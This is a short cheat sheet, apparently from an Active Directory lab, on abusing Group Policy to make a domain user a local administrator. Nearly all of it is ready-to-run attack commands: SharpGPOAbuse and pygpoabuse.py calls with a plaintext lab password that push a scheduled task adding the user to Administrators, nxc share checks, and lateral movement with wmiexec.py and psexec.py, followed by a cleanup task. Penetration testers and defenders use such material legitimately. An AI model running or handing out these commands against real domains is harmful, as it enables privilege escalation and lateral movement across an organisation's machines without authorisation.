Local group membership through GPO is a direct route to workstation or server control. We use a policy to add a domain principal to a local group, usually Administrators, on every machine where the GPO applies.
SharpGPOAbuse add local admin
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "OOTW\student" --GPOName "Misconfigured Policy"
Command-based local admin through immediate task
pygpoabuse.py "ootw.local/gpoadm:Password123!@10.10.10.200" \
-gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
-command "cmd.exe /c net localgroup administrators ootw\\student /add" \
-taskname "LocalAdminTask"
Native command on one host after policy applies
net localgroup administrators
whoami /groups
Validate lateral movement
nxc smb 10.10.10.201 -d ootw.local -u student -p 'student'
nxc smb 10.10.10.201 -d ootw.local -u student -p 'student' --shares
Use the new local admin position
wmiexec.py 'ootw.local/student:student@10.10.10.201'
psexec.py 'ootw.local/student:student@10.10.10.201'
Cleanup command through GPO task
pygpoabuse.py "ootw.local/gpoadm:Password123!@10.10.10.200" \
-gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" \
-command "cmd.exe /c net localgroup administrators ootw\\student /delete" \
-taskname "LocalAdminCleanup"
Notes
Local admin through GPO is scope-dependent. A policy linked to Workstations does not automatically affect servers or domain controllers.
Restricted Groups and Group Policy Preferences can both manage local groups. Always inspect the resulting XML or registry policy so we know which mechanism is being used.